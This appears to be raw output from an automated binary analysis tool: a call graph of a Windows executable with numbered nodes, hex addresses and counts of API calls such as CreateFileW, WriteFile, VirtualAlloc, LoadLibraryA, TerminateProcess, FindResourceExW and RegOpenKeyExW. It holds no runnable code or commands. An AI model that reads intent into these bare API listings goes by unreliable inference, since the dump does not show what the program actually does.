97045 9f719b 97043->97045 97046 9f71d6 97044->97046 97047 986b57 22 API calls 97045->97047 97048 986350 22 API calls 97046->97048 97047->97036 97049 9f71e4 97048->97049 97050 987510 53 API calls 97049->97050 97051 9f71f0 97050->97051 97674 9ed7bc 97051->97674 97053 9f7201 97054 9ed4ce 4 API calls 97053->97054 97055 9f720b 97054->97055 97056 987510 53 API calls 97055->97056 97059 9f7239 97055->97059 97057 9f7229 97056->97057 97728 9f2947 97057->97728 97060 984f39 68 API calls 97059->97060 97060->97061 97061->96798 97062->96790 97063->96758 97064->96760 97065->96770 97066->96775 97067->96775 97068->96756 97069->96798 97070->96798 97071->96798 97072->96795 97073->96798 97074->96823 97075->96824 97076->96826 97077->96828 97078->96849 97079->96849 97080->96845 97081->96845 97082->96851 97083->96845 97085 9edbdc GetFileAttributesW 97084->97085 97086 9ed4d5 97084->97086 97085->97086 97087 9edbe8 FindFirstFileW 97085->97087 97086->96798 97087->97086 97088 9edbf9 FindClose 97087->97088 97088->97086 97090 989c7e 97089->97090 97091 9cf545 97089->97091 97096 99fddb 22 API calls 97090->97096 97092 9cf556 97091->97092 97093 986b57 22 API calls 97091->97093 97094 98a6c3 22 API calls 97092->97094 97093->97092 97095 9cf560 97094->97095 97095->97095 97097 989c91 97096->97097 97098 989c9a 97097->97098 97099 989cac 97097->97099 97100 989cb3 22 API calls 97098->97100 97101 98a961 22 API calls 97099->97101 97102 989ca2 97100->97102 97101->97102 97102->96859 97102->96863 97190 9854c6 97103->97190 97106 9854c6 3 API calls 97107 99fa9a 97106->97107 97107->96880 97109 99fe0b 22 API calls 97108->97109 97110 986295 97109->97110 97111 99fddb 22 API calls 97110->97111 97112 9862a3 97111->97112 97113 99f141 97112->97113 97114 99f188 97113->97114 97115 99f14c 97113->97115 97116 98a6c3 22 API calls 97114->97116 97115->97114 97119 99f15b 97115->97119 97123 9ecaeb 97116->97123 97117 99f170 97196 99f18e 97117->97196 97119->97117 97120 99f17d 97119->97120 97203 9ecbf2 26 API calls 97120->97203 97121 9ecb1a 97121->96896 97123->97121 97204 9eca89 ReadFile SetFilePointerEx 97123->97204 97205 9849bd 22 API calls __fread_nolock 97123->97205 97124 99f179 97124->96896 97128 98b578 97127->97128 97129 98b57f 97127->97129 97128->97129 97241 9a62d1 39 API calls 97128->97241 97129->96868 97131 98b5c2 97131->96868 97133 98625f 97132->97133 97134 986250 97132->97134 97133->97134 97135 986264 CloseHandle 97133->97135 97134->96869 97135->97134 97137 987525 97136->97137 97152 987522 97136->97152 97138 98752d 97137->97138 97139 98755b 97137->97139 97242 9a51c6 26 API calls 97138->97242 97142 98756d 97139->97142 97149 9c500f 97139->97149 97150 9c50f6 97139->97150 97243 99fb21 51 API calls 97142->97243 97143 98753d 97147 99fddb 22 API calls 97143->97147 97144 9c510e 97144->97144 97148 987547 97147->97148 97151 989cb3 22 API calls 97148->97151 97153 99fe0b 22 API calls 97149->97153 97158 9c5088 97149->97158 97245 9a5183 26 API calls 97150->97245 97151->97152 97152->96879 97154 9c5058 97153->97154 97155 99fddb 22 API calls 97154->97155 97156 9c507f 97155->97156 97157 989cb3 22 API calls 97156->97157 97157->97158 97244 99fb21 51 API calls 97158->97244 97160 98575c CreateFileW 97159->97160 97161 9c4035 97159->97161 97162 98577b 97160->97162 97161->97162 97163 9c403b CreateFileW 97161->97163 97162->96890 97162->96891 97163->97162 97164 9c4063 97163->97164 97165 9854c6 3 API calls 97164->97165 97166 9c406e 97165->97166 97166->97162 97168 9853f3 97167->97168 97181 9853f0 messages 97167->97181 97169 9854c6 3 API calls 97168->97169 97168->97181 97170 985410 97169->97170 97171 98541d 97170->97171 97172 9c3f4b 97170->97172 97174 99fe0b 22 API calls 97171->97174 97173 99fa5b 3 API calls 97172->97173 97173->97181 97175 985429 97174->97175 97176 985722 22 API calls 97175->97176 97177 985433 97176->97177 97178 989a40 2 API calls 97177->97178 97179 98543f 97178->97179 97180 9854c6 3 API calls 97179->97180 97180->97181 97181->96900 97182->96906 97183->96903 97184->96907 97185->96911 97186->96863 97187->96863 97188->96893 97189->96904 97195 9854dd 97190->97195 97191 9c3f9c SetFilePointerEx 97192 985564 SetFilePointerEx SetFilePointerEx 97193 985530 97192->97193 97193->97106 97194 9c3f8b 97194->97191 97195->97191 97195->97192 97195->97193 97195->97194 97206 99f1d8 97196->97206 97202 99f1c1 97202->97124 97203->97124 97204->97123 97205->97123 97207 99fe0b 22 API calls 97206->97207 97208 99f1ef 97207->97208 97209 99fddb 22 API calls 97208->97209 97210 99f1a6 97209->97210 97211 9897b6 97210->97211 97225 989a1e 97211->97225 97213 9897c7 97215 9897fc 97213->97215 97232 989a40 97213->97232 97238 989b01 22 API calls __fread_nolock 97213->97238 97215->97202 97217 986e14 MultiByteToWideChar 97215->97217 97218 986e40 97217->97218 97219 986e87 97217->97219 97220 99fe0b 22 API calls 97218->97220 97221 98a6c3 22 API calls 97219->97221 97222 986e55 MultiByteToWideChar 97220->97222 97224 986e7b 97221->97224 97240 986e90 22 API calls __fread_nolock 97222->97240 97224->97202 97226 9cf378 97225->97226 97227 989a2f 97225->97227 97228 99fddb 22 API calls 97226->97228 97227->97213 97229 9cf382 97228->97229 97230 99fe0b 22 API calls 97229->97230 97231 9cf397 97230->97231 97233 989abb 97232->97233 97236 989a4e 97232->97236 97239 99e40f SetFilePointerEx 97233->97239 97235 989a7c 97235->97213 97236->97235 97237 989a8c ReadFile 97236->97237 97237->97235 97237->97236 97238->97213 97239->97236 97240->97224 97241->97131 97242->97143 97243->97143 97244->97150 97245->97144 97247 987510 53 API calls 97246->97247 97248 a07f90 97247->97248 97272 a07fd5 messages 97248->97272 97284 a08cd3 97248->97284 97250 a08281 97251 a0844f 97250->97251 97256 a0828f 97250->97256 97325 a08ee4 60 API calls 97251->97325 97254 a0845e 97254->97256 97257 a0846a 97254->97257 97255 987510 53 API calls 97274 a08049 97255->97274 97297 a07e86 97256->97297 97257->97272 97262 a082c8 97312 99fc70 97262->97312 97265 a08302 97319 9863eb 22 API calls 97265->97319 97266 a082e8 97318 9f359c 82 API calls __wsopen_s 97266->97318 97269 a082f3 GetCurrentProcess TerminateProcess 97269->97265 97270 a08311 97320 986a50 22 API calls 97270->97320 97272->96915 97273 a0832a 97282 a08352 97273->97282 97321 9904f0 22 API calls 97273->97321 97274->97250 97274->97255 97274->97272 97316 9e417d 22 API calls __fread_nolock 97274->97316 97317 a0851d 42 API calls _strftime 97274->97317 97275 a084c5 97275->97272 97280 a084d9 FreeLibrary 97275->97280 97277 a08341 97322 a08b7b 75 API calls 97277->97322 97280->97272 97282->97275 97323 9904f0 22 API calls 97282->97323 97324 98aceb 23 API calls messages 97282->97324 97326 a08b7b 75 API calls 97282->97326 97285 98aec9 22 API calls 97284->97285 97286 a08cee CharLowerBuffW 97285->97286 97327 9e8e54 97286->97327 97290 98a961 22 API calls 97291 a08d2a 97290->97291 97334 986d25 97291->97334 97293 a08d3e 97294 9893b2 22 API calls 97293->97294 97296 a08d48 _wcslen 97294->97296 97295 a08e5e _wcslen 97295->97274 97296->97295 97347 a0851d 42 API calls _strftime 97296->97347 97298 a07ea1 97297->97298 97302 a07eec 97297->97302 97299 99fe0b 22 API calls 97298->97299 97301 a07ec3 97299->97301 97300 99fddb 22 API calls 97300->97301 97301->97300 97301->97302 97303 a09096 97302->97303 97304 a092ab messages 97303->97304 97311 a090ba _strcat _wcslen 97303->97311 97304->97262 97305 98b567 39 API calls 97305->97311 97306 98b38f 39 API calls 97306->97311 97307 98b6b5 39 API calls 97307->97311 97308 987510 53 API calls 97308->97311 97309 9aea0c 21 API calls ___std_exception_copy 97309->97311 97311->97304 97311->97305 97311->97306 97311->97307 97311->97308 97311->97309 97351 9eefae 24 API calls _wcslen 97311->97351 97314 99fc85 97312->97314 97313 99fd1d VirtualAlloc 97315 99fceb 97313->97315 97314->97313 97314->97315 97315->97265 97315->97266 97316->97274 97317->97274 97318->97269 97319->97270 97320->97273 97321->97277 97322->97282 97323->97282 97324->97282 97325->97254 97326->97282 97329 9e8e74 _wcslen 97327->97329 97328 9e8f63 97328->97290 97328->97296 97329->97328 97330 9e8f68 97329->97330 97331 9e8ea9 97329->97331 97330->97328 97349 99ce60 41 API calls 97330->97349 97331->97328 97348 99ce60 41 API calls 97331->97348 97335 986d91 97334->97335 97336 986d34 97334->97336 97337 9893b2 22 API calls 97335->97337 97336->97335 97338 986d3f 97336->97338 97339 986d62 __fread_nolock 97337->97339 97340 9c4c9d 97338->97340 97341 986d5a 97338->97341 97339->97293 97342 99fddb 22 API calls 97340->97342 97350 986f34 22 API calls 97341->97350 97344 9c4ca7 97342->97344 97345 99fe0b 22 API calls 97344->97345 97346 9c4cda 97345->97346 97347->97295 97348->97331 97349->97330 97350->97339 97351->97311 97353 9ae684 BuildCatchObjectHelperInternal 97352->97353 97354 9ae6aa 97353->97354 97355 9ae695 97353->97355 97364 9ae6a5 __fread_nolock 97354->97364 97365 9a918d EnterCriticalSection 97354->97365 97382 9af2d9 20 API calls __dosmaperr 97355->97382 97358 9ae69a 97383 9b27ec 26 API calls _strftime 97358->97383 97359 9ae6c6 97366 9ae602 97359->97366 97362 9ae6d1 97384 9ae6ee LeaveCriticalSection __fread_nolock 97362->97384 97364->96921 97365->97359 97367 9ae60f 97366->97367 97369 9ae624 97366->97369 97410 9af2d9 20 API calls __dosmaperr 97367->97410 97375 9ae61f 97369->97375 97385 9adc0b 97369->97385 97370 9ae614 97411 9b27ec 26 API calls _strftime 97370->97411 97375->97362 97377 9ad955 __fread_nolock 26 API calls 97378 9ae646 97377->97378 97395 9b862f 97378->97395 97381 9b29c8 _free 20 API calls 97381->97375 97382->97358 97383->97364 97384->97364 97386 9adc23 97385->97386 97390 9adc1f 97385->97390 97387 9ad955 __fread_nolock 26 API calls 97386->97387 97386->97390 97388 9adc43 97387->97388 97412 9b59be 97388->97412 97391 9b4d7a 97390->97391 97392 9b4d90 97391->97392 97393 9ae640 97391->97393 97392->97393 97394 9b29c8 _free 20 API calls 97392->97394 97393->97377 97394->97393 97396 9b863e 97395->97396 97397 9b8653 97395->97397 97527 9af2c6 20 API calls __dosmaperr 97396->97527 97399 9b868e 97397->97399 97403 9b867a 97397->97403 97529 9af2c6 20 API calls __dosmaperr 97399->97529 97400 9b8643 97528 9af2d9 20 API calls __dosmaperr 97400->97528 97524 9b8607 97403->97524 97404 9b8693 97530 9af2d9 20 API calls __dosmaperr 97404->97530 97407 9ae64c 97407->97375 97407->97381 97408 9b869b 97531 9b27ec 26 API calls _strftime 97408->97531 97410->97370 97411->97375 97413 9b59ca BuildCatchObjectHelperInternal 97412->97413 97414 9b59d2 97413->97414 97416 9b59ea 97413->97416 97491 9af2c6 20 API calls __dosmaperr 97414->97491 97415 9b5a88 97496 9af2c6 20 API calls __dosmaperr 97415->97496 97416->97415 97421 9b5a1f 97416->97421 97419 9b59d7 97492 9af2d9 20 API calls __dosmaperr 97419->97492 97420 9b5a8d 97497 9af2d9 20 API calls __dosmaperr 97420->97497 97437 9b5147 EnterCriticalSection 97421->97437 97425 9b5a95 97498 9b27ec 26 API calls _strftime 97425->97498 97426 9b5a25 97428 9b5a41 97426->97428 97429 9b5a56 97426->97429 97493 9af2d9 20 API calls __dosmaperr 97428->97493 97438 9b5aa9 97429->97438 97431 9b59df __fread_nolock 97431->97390 97433 9b5a46 97494 9af2c6 20 API calls __dosmaperr 97433->97494 97434 9b5a51 97495 9b5a80 LeaveCriticalSection __wsopen_s 97434->97495 97437->97426 97439 9b5ad7 97438->97439 97479 9b5ad0 97438->97479 97440 9b5adb 97439->97440 97441 9b5afa 97439->97441 97506 9af2c6 20 API calls __dosmaperr 97440->97506 97444 9b5b4b 97441->97444 97445 9b5b2e 97441->97445 97442 9a0a8c CatchGuardHandler 5 API calls 97446 9b5cb1 97442->97446 97449 9b5b61 97444->97449 97512 9b9424 28 API calls __fread_nolock 97444->97512 97509 9af2c6 20 API calls __dosmaperr 97445->97509 97446->97434 97447 9b5ae0 97507 9af2d9 20 API calls __dosmaperr 97447->97507 97499 9b564e 97449->97499 97452 9b5b33 97510 9af2d9 20 API calls __dosmaperr 97452->97510 97454 9b5ae7 97508 9b27ec 26 API calls _strftime 97454->97508 97458 9b5ba8 97464 9b5bbc 97458->97464 97465 9b5c02 WriteFile 97458->97465 97459 9b5b6f 97461 9b5b73 97459->97461 97462 9b5b95 97459->97462 97460 9b5b3b 97511 9b27ec 26 API calls _strftime 97460->97511 97466 9b5c69 97461->97466 97513 9b55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 97461->97513 97514 9b542e 45 API calls 3 library calls 97462->97514 97469 9b5bf2 97464->97469 97470 9b5bc4 97464->97470 97468 9b5c25 GetLastError 97465->97468 97473 9b5b8b 97465->97473 97466->97479 97521 9af2d9 20 API calls __dosmaperr 97466->97521 97468->97473 97517 9b56c4 7 API calls 2 library calls 97469->97517 97474 9b5bc9 97470->97474 97475 9b5be2 97470->97475 97473->97466 97473->97479 97483 9b5c45 97473->97483 97474->97466 97476 9b5bd2 97474->97476 97516 9b5891 8 API calls 2 library calls 97475->97516 97515 9b57a3 7 API calls 2 library calls 97476->97515 97478 9b5be0 97478->97473 97479->97442 97482 9b5c8e 97522 9af2c6 20 API calls __dosmaperr 97482->97522 97485 9b5c4c 97483->97485 97486 9b5c60 97483->97486 97518 9af2d9 20 API calls __dosmaperr 97485->97518 97520 9af2a3 20 API calls __dosmaperr 97486->97520 97489 9b5c51 97519 9af2c6 20 API calls __dosmaperr 97489->97519 97491->97419 97492->97431 97493->97433 97494->97434 97495->97431 97496->97420 97497->97425 97498->97431 97500 9bf89b __fread_nolock 26 API calls 97499->97500 97501 9b565e 97500->97501 97503 9b5663 97501->97503 97523 9b2d74 38 API calls 3 library calls 97501->97523 97503->97458 97503->97459 97504 9b5686 97504->97503 97505 9b56a4 GetConsoleMode 97504->97505 97505->97503 97506->97447 97507->97454 97508->97479 97509->97452 97510->97460 97511->97479 97512->97449 97513->97473 97514->97473 97515->97478 97516->97478 97517->97478 97518->97489 97519->97479 97520->97479 97521->97482 97522->97479 97523->97504 97532 9b8585 97524->97532 97526 9b862b 97526->97407 97527->97400 97528->97407 97529->97404 97530->97408 97531->97407 97533 9b8591 BuildCatchObjectHelperInternal 97532->97533 97543 9b5147 EnterCriticalSection 97533->97543 97535 9b859f 97536 9b85d1 97535->97536 97537 9b85c6 97535->97537 97559 9af2d9 20 API calls __dosmaperr 97536->97559 97544 9b86ae 97537->97544 97540 9b85cc 97560 9b85fb LeaveCriticalSection __wsopen_s 97540->97560 97542 9b85ee __fread_nolock 97542->97526 97543->97535 97561 9b53c4 97544->97561 97546 9b86c4 97574 9b5333 21 API calls 2 library calls 97546->97574 97547 9b86be 97547->97546 97548 9b86f6 97547->97548 97550 9b53c4 __wsopen_s 26 API calls 97547->97550 97548->97546 97551 9b53c4 __wsopen_s 26 API calls 97548->97551 97553 9b86ed 97550->97553 97554 9b8702 FindCloseChangeNotification 97551->97554 97552 9b871c 97555 9b873e 97552->97555 97575 9af2a3 20 API calls __dosmaperr 97552->97575 97557 9b53c4 __wsopen_s 26 API calls 97553->97557 97554->97546 97558 9b870e GetLastError 97554->97558 97555->97540 97557->97548 97558->97546 97559->97540 97560->97542 97562 9b53d1 97561->97562 97563 9b53e6 97561->97563 97576 9af2c6 20 API calls __dosmaperr 97562->97576 97567 9b540b 97563->97567 97578 9af2c6 20 API calls __dosmaperr 97563->97578 97566 9b53d6 97577 9af2d9 20 API calls __dosmaperr 97566->97577 97567->97547 97568 9b5416 97579 9af2d9 20 API calls __dosmaperr 97568->97579 97570 9b53de 97570->97547 97572 9b541e 97580 9b27ec 26 API calls _strftime 97572->97580 97574->97552 97575->97555 97576->97566 97577->97570 97578->97568 97579->97572 97580->97570 97582 98a961 22 API calls 97581->97582 97583 985275 97582->97583 97584 98a961 22 API calls 97583->97584 97585 98527d 97584->97585 97586 98a961 22 API calls 97585->97586 97587 985285 97586->97587 97588 98a961 22 API calls 97587->97588 97589 98528d 97588->97589 97590 9c3df5 97589->97590 97591 9852c1 97589->97591 97592 98a8c7 22 API calls 97590->97592 97593 986d25 22 API calls 97591->97593 97594 9c3dfe 97592->97594 97595 9852cf 97593->97595 97596 98a6c3 22 API calls 97594->97596 97597 9893b2 22 API calls 97595->97597 97599 985304 97596->97599 97598 9852d9 97597->97598 97598->97599 97600 986d25 22 API calls 97598->97600 97603 985325 97599->97603 97613 9c3e20 97599->97613 97616 985349 97599->97616 97602 9852fa 97600->97602 97601 986d25 22 API calls 97604 98535a 97601->97604 97605 9893b2 22 API calls 97602->97605 97603->97616 97637 984c6d 97603->97637 97607 985370 97604->97607 97612 98a8c7 22 API calls 97604->97612 97605->97599 97608 985384 97607->97608 97614 98a8c7 22 API calls 97607->97614 97611 98538f 97608->97611 97617 98a8c7 22 API calls 97608->97617 97610 986b57 22 API calls 97620 9c3ee0 97610->97620 97618 98a8c7 22 API calls 97611->97618 97622 98539a 97611->97622 97612->97607 97613->97610 97614->97608 97615 986d25 22 API calls 97615->97616 97616->97601 97617->97611 97618->97622 97619 984c6d 22 API calls 97619->97620 97620->97616 97620->97619 97640 9849bd 22 API calls __fread_nolock 97620->97640 97622->96945 97624 986362 97623->97624 97625 9c4a51 97623->97625 97641 986373 97624->97641 97651 984a88 22 API calls __fread_nolock 97625->97651 97628 98636e 97628->96952 97628->96954 97629 9c4a5b 97630 9c4a67 97629->97630 97631 98a8c7 22 API calls 97629->97631 97631->97630 97632->96969 97633->96973 97634->96974 97635->96971 97636->96971 97638 98aec9 22 API calls 97637->97638 97639 984c78 97638->97639 97639->97615 97639->97616 97640->97620 97642 986382 97641->97642 97648 9863b6 __fread_nolock 97641->97648 97643 9c4a82 97642->97643 97644 9863a9 97642->97644 97642->97648 97645 99fddb 22 API calls 97643->97645 97646 98a587 22 API calls 97644->97646 97647 9c4a91 97645->97647 97646->97648 97649 99fe0b 22 API calls 97647->97649 97648->97628 97650 9c4ac5 __fread_nolock 97649->97650 97651->97629 97785 984e90 LoadLibraryA 97652->97785 97657 9c3ccf 97660 984f39 68 API calls 97657->97660 97658 984ef6 LoadLibraryExW 97793 984e59 LoadLibraryA 97658->97793 97662 9c3cd6 97660->97662 97664 984e59 3 API calls 97662->97664 97666 9c3cde 97664->97666 97665 984f20 97665->97666 97667 984f2c 97665->97667 97815 9850f5 97666->97815 97668 984f39 68 API calls 97667->97668 97671 984f31 97668->97671 97671->96997 97671->96998 97673 9c3d05 97675 9ed7d8 97674->97675 97676 9ed7dd 97675->97676 97677 9ed7f3 97675->97677 97680 98a8c7 22 API calls 97676->97680 97727 9ed7ee 97676->97727 97678 98a961 22 API calls 97677->97678 97679 9ed7fb 97678->97679 97681 98a961 22 API calls 97679->97681 97680->97727 97682 9ed803 97681->97682 97683 98a961 22 API calls 97682->97683 97684 9ed80e 97683->97684 97685 98a961 22 API calls 97684->97685 97686 9ed816 97685->97686 97687 98a961 22 API calls 97686->97687 97688 9ed81e 97687->97688 97689 98a961 22 API calls 97688->97689 97690 9ed826 97689->97690 97691 98a961 22 API calls 97690->97691 97692 9ed82e 97691->97692 97693 98a961 22 API calls 97692->97693 97694 9ed836 97693->97694 97695 98525f 22 API calls 97694->97695 97696 9ed84d 97695->97696 97697 98525f 22 API calls 97696->97697 97698 9ed866 97697->97698 97699 984c6d 22 API calls 97698->97699 97700 9ed872 97699->97700 97701 9ed885 97700->97701 97702 9893b2 22 API calls 97700->97702 97703 984c6d 22 API calls 97701->97703 97702->97701 97704 9ed88e 97703->97704 97705 9ed89e 97704->97705 97707 9893b2 22 API calls 97704->97707 97706 9ed8b0 97705->97706 97708 98a8c7 22 API calls 97705->97708 97709 986350 22 API calls 97706->97709 97707->97705 97708->97706 97710 9ed8bb 97709->97710 97962 9ed978 22 API calls 97710->97962 97712 9ed8ca 97963 9ed978 22 API calls 97712->97963 97714 9ed8dd 97715 984c6d 22 API calls 97714->97715 97716 9ed8e7 97715->97716 97717 9ed8fe 97716->97717 97718 9ed8ec 97716->97718 97720 984c6d 22 API calls 97717->97720 97719 9833c6 22 API calls 97718->97719 97722 9ed8f9 97719->97722 97721 9ed907 97720->97721 97723 9ed925 97721->97723 97724 9833c6 22 API calls 97721->97724 97725 986350 22 API calls 97722->97725 97726 986350 22 API calls 97723->97726 97724->97722 97725->97723 97726->97727 97727->97053 97729 9f2954 __wsopen_s 97728->97729 97730 99fe0b 22 API calls 97729->97730 97731 9f2971 97730->97731 97732 985722 22 API calls 97731->97732 97733 9f297b 97732->97733 97734 9f274e 27 API calls 97733->97734 97735 9f2986 97734->97735 97736 98511f 64 API calls 97735->97736 97737 9f299b 97736->97737 97738 9f29bf 97737->97738 97739 9f2a6c 97737->97739 97977 9f2e66 97738->97977 97741 9f2e66 75 API calls 97739->97741 97756 9f2a38 97741->97756 97744 9850f5 40 API calls 97745 9f2a91 97744->97745 97746 9850f5 40 API calls 97745->97746 97749 9f2aa1 97746->97749 97747 9f2a75 messages 97747->97059 97748 9f29ed 97984 9ad583 26 API calls 97748->97984 97750 9850f5 40 API calls 97749->97750 97752 9f2abc 97750->97752 97753 9850f5 40 API calls 97752->97753 97754 9f2acc 97753->97754 97755 9850f5 40 API calls 97754->97755 97757 9f2ae7 97755->97757 97756->97744 97756->97747 97758 9850f5 40 API calls 97757->97758 97759 9f2af7 97758->97759 97760 9850f5 40 API calls 97759->97760 97761 9f2b07 97760->97761 97762 9850f5 40 API calls 97761->97762 97763 9f2b17 97762->97763 97964 9f3017 GetTempPathW GetTempFileNameW 97763->97964 97765 9f2b22 97766 9ae5eb 29 API calls 97765->97766 97768 9f2b33 97766->97768 97767 9ae678 67 API calls 97768->97747 97770 9850f5 40 API calls 97768->97770 97779 9f2bed 97768->97779 97965 9adbb3 97768->97965 97770->97768 97779->97767 97783->97020 97784->97034 97786 984ea8 GetProcAddress 97785->97786 97787 984ec6 97785->97787 97788 984eb8 97786->97788 97790 9ae5eb 97787->97790 97788->97787 97789 984ebf FreeLibrary 97788->97789 97789->97787 97823 9ae52a 97790->97823 97792 984eea 97792->97657 97792->97658 97794 984e8d 97793->97794 97795 984e6e GetProcAddress 97793->97795 97798 984f80 97794->97798 97796 984e7e 97795->97796 97796->97794 97797 984e86 FreeLibrary 97796->97797 97797->97794 97799 99fe0b 22 API calls 97798->97799 97800 984f95 97799->97800 97801 985722 22 API calls 97800->97801 97802 984fa1 __fread_nolock 97801->97802 97803 984fdc 97802->97803 97804 9c3d1d 97802->97804 97805 9850a5 97802->97805 97808 9c3d22 97803->97808 97809 9850f5 40 API calls 97803->97809 97814 98506e messages 97803->97814 97881 98511f 97803->97881 97886 9f304d 74 API calls 97804->97886 97875 9842a2 CreateStreamOnHGlobal 97805->97875 97810 98511f 64 API calls 97808->97810 97809->97803 97811 9c3d45 97810->97811 97812 9850f5 40 API calls 97811->97812 97812->97814 97814->97665 97816 9c3d70 97815->97816 97817 985107 97815->97817 97908 9ae8c4 97817->97908 97820 9f28fe 97945 9f274e 97820->97945 97822 9f2919 97822->97673 97824 9ae536 BuildCatchObjectHelperInternal 97823->97824 97825 9ae544 97824->97825 97827 9ae574 97824->97827 97848 9af2d9 20 API calls __dosmaperr 97825->97848 97829 9ae579 97827->97829 97830 9ae586 97827->97830 97828 9ae549 97849 9b27ec 26 API calls _strftime 97828->97849 97850 9af2d9 20 API calls __dosmaperr 97829->97850 97840 9b8061 97830->97840 97834 9ae58f 97835 9ae5a2 97834->97835 97836 9ae595 97834->97836 97852 9ae5d4 LeaveCriticalSection __fread_nolock 97835->97852 97851 9af2d9 20 API calls __dosmaperr 97836->97851 97837 9ae554 __fread_nolock 97837->97792 97841 9b806d BuildCatchObjectHelperInternal 97840->97841 97853 9b2f5e EnterCriticalSection 97841->97853 97843 9b807b 97854 9b80fb 97843->97854 97847 9b80ac __fread_nolock 97847->97834 97848->97828 97849->97837 97850->97837 97851->97837 97852->97837 97853->97843 97861 9b811e 97854->97861 97855 9b8177 97856 9b4c7d __dosmaperr 20 API calls 97855->97856 97858 9b8180 97856->97858 97859 9b29c8 _free 20 API calls 97858->97859 97860 9b8189 97859->97860 97866 9b8088 97860->97866 97872 9b3405 11 API calls 2 library calls 97860->97872 97861->97855 97861->97861 97861->97866 97870 9a918d EnterCriticalSection 97861->97870 97871 9a91a1 LeaveCriticalSection 97861->97871 97863 9b81a8 97873 9a918d EnterCriticalSection 97863->97873 97867 9b80b7 97866->97867 97874 9b2fa6 LeaveCriticalSection 97867->97874 97869 9b80be 97869->97847 97870->97861 97871->97861 97872->97863 97873->97866 97874->97869 97876 9842bc FindResourceExW 97875->97876 97877 9842d9 97875->97877 97876->97877 97878 9c35ba LoadResource 97876->97878 97877->97803 97878->97877 97879 9c35cf SizeofResource 97878->97879 97879->97877 97880 9c35e3 LockResource 97879->97880 97880->97877 97882 98512e 97881->97882 97883 9c3d90 97881->97883 97887 9aece3 97882->97887 97886->97808 97890 9aeaaa 97887->97890 97889 98513c 97889->97803 97894 9aeab6 BuildCatchObjectHelperInternal 97890->97894 97891 9aeac2 97903 9af2d9 20 API calls __dosmaperr 97891->97903 97893 9aeae8 97905 9a918d EnterCriticalSection 97893->97905 97894->97891 97894->97893 97895 9aeac7 97904 9b27ec 26 API calls _strftime 97895->97904 97898 9aeaf4 97906 9aec0a 62 API calls 2 library calls 97898->97906 97900 9aeb08 97907 9aeb27 LeaveCriticalSection __fread_nolock 97900->97907 97902 9aead2 __fread_nolock 97902->97889 97903->97895 97904->97902 97905->97898 97906->97900 97907->97902 97911 9ae8e1 97908->97911 97910 985118 97910->97820 97912 9ae8ed BuildCatchObjectHelperInternal 97911->97912 97913 9ae92d 97912->97913 97914 9ae900 ___scrt_fastfail 97912->97914 97915 9ae925 __fread_nolock 97912->97915 97924 9a918d EnterCriticalSection 97913->97924 97938 9af2d9 20 API calls __dosmaperr 97914->97938 97915->97910 97917 9ae937 97925 9ae6f8 97917->97925 97920 9ae91a 97939 9b27ec 26 API calls _strftime 97920->97939 97924->97917 97929 9ae70a ___scrt_fastfail 97925->97929 97931 9ae727 97925->97931 97926 9ae717 97941 9af2d9 20 API calls __dosmaperr 97926->97941 97928 9ae71c 97942 9b27ec 26 API calls _strftime 97928->97942 97929->97926 97929->97931 97936 9ae76a __fread_nolock 97929->97936 97940 9ae96c LeaveCriticalSection __fread_nolock 97931->97940 97932 9ae886 ___scrt_fastfail 97944 9af2d9 20 API calls __dosmaperr 97932->97944 97934 9ad955 __fread_nolock 26 API calls 97934->97936 97936->97931 97936->97932 97936->97934 97937 9b8d45 __fread_nolock 38 API calls 97936->97937 97943 9acf78 26 API calls 4 library calls 97936->97943 97937->97936 97938->97920 97939->97915 97940->97915 97941->97928 97942->97931 97943->97936 97944->97928 97948 9ae4e8 97945->97948 97947 9f275d 97947->97822 97951 9ae469 97948->97951 97950 9ae505 97950->97947 97952 9ae478 97951->97952 97953 9ae48c 97951->97953 97959 9af2d9 20 API calls __dosmaperr 97952->97959 97958 9ae488 __alldvrm 97953->97958 97961 9b333f 11 API calls 2 library calls 97953->97961 97955 9ae47d 97960 9b27ec 26 API calls _strftime 97955->97960 97958->97950 97959->97955 97960->97958 97961->97958 97962->97712 97963->97714 97964->97765 97966 9adbdd 97965->97966 97967 9adbc1 97965->97967 97966->97768 97967->97966 97978 9f2e7a 97977->97978 97979 9f29c4 97978->97979 97980 9850f5 40 API calls 97978->97980 97981 9f28fe 27 API calls 97978->97981 97982 98511f 64 API calls 97978->97982 97979->97747 97983 9ad583 26 API calls 97979->97983 97980->97978 97981->97978 97982->97978 97983->97748 97984->97756 98092 98df10 98095 98b710 98092->98095 98096 98b72b 98095->98096 98097 9d00f8 98096->98097 98098 9d0146 98096->98098 98125 98b750 98096->98125 98101 9d0102 98097->98101 98104 9d010f 98097->98104 98097->98125 98137 a058a2 256 API calls 2 library calls 98098->98137 98135 a05d33 256 API calls 98101->98135 98121 98ba20 98104->98121 98136 a061d0 256 API calls 2 library calls 98104->98136 98108 9d03d9 98108->98108 98110 99d336 40 API calls 98110->98125 98111 98ba4e 98113 9d0322 98140 a05c0c 82 API calls 98113->98140 98120 98bbe0 40 API calls 98120->98125 98121->98111 98141 9f359c 82 API calls __wsopen_s 98121->98141 98122 98ec40 256 API calls 98122->98125 98123 98a8c7 22 API calls 98123->98125 98125->98110 98125->98111 98125->98113 98125->98120 98125->98121 98125->98122 98125->98123 98126 98a81b 41 API calls 98125->98126 98127 99d2f0 40 API calls 98125->98127 98128 99a01b 256 API calls 98125->98128 98129 9a0242 5 API calls __Init_thread_wait 98125->98129 98130 99edcd 22 API calls 98125->98130 98131 9a00a3 29 API calls __onexit 98125->98131 98132 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98125->98132 98133 99ee53 82 API calls 98125->98133 98134 99e5ca 256 API calls 98125->98134 98138 98aceb 23 API calls messages 98125->98138 98139 9df6bf 23 API calls 98125->98139 98126->98125 98127->98125 98128->98125 98129->98125 98130->98125 98131->98125 98132->98125 98133->98125 98134->98125 98135->98104 98136->98121 98137->98125 98138->98125 98139->98125 98140->98121 98141->98108 98142 981033 98147 984c91 98142->98147 98146 981042 98148 98a961 22 API calls 98147->98148 98149 984cff 98148->98149 98155 983af0 98149->98155 98152 984d9c 98153 981038 98152->98153 98158 9851f7 22 API calls __fread_nolock 98152->98158 98154 9a00a3 29 API calls __onexit 98153->98154 98154->98146 98159 983b1c 98155->98159 98158->98152 98160 983b0f 98159->98160 98161 983b29 98159->98161 98160->98152 98161->98160 98162 983b30 RegOpenKeyExW 98161->98162 98162->98160 98163 983b4a RegQueryValueExW 98162->98163 98164 983b6b 98163->98164 98165 983b80 RegCloseKey 98163->98165 98164->98165 